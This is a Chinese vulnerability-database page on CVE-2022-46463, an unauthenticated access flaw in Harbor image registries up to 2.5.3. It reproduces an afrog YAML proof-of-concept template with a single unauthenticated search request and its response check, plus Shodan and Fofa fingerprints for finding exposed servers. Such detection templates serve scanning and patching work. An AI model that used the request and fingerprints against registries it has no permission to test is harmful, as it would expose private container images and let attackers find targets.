CVE-2022-46463: Harbor <=2.5.3 - Unauthorized Access

日期: 2025-09-01 | 影响软件: Harbor | POC: 已公开

漏洞描述

An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication Shodan: http.favicon.hash:657337228 Fofa: icon_hash="657337228"

PoC代码[已公开]

id: CVE-2022-46463

info:
  name: Harbor <=2.5.3 - Unauthorized Access
  author: Arm!tage
  severity: high
  description: |
    An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
    Shodan: http.favicon.hash:657337228
    Fofa: icon_hash="657337228"
  remediation: |
    Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46463
    - https://github.com/Vad1mo
    - https://github.com/lanqingaa/123/blob/main/README.md
    - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d
  tags: cve,cve2022,harbor,auth-bypass,exposure
  created: 2023/10/14

rules:
  r0:
    request:
      method: GET
      path: /api/v2.0/search?q=/
    expression: response.status == 200 && response.body.bcontains(b'repository_name') && response.body.bcontains(b'project_name')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-46463.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2019-16097: Harbor <=1.82.0 - Privilege Escalation POC

Harbor CVE-2022-46463 未授权访问漏洞 无POC

Harbor Project Harbor用户API权限提升漏洞 无POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

Harbor CVE-2022-46463 未授权访问漏洞无POC

Harbor Project Harbor用户API权限提升漏洞无POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC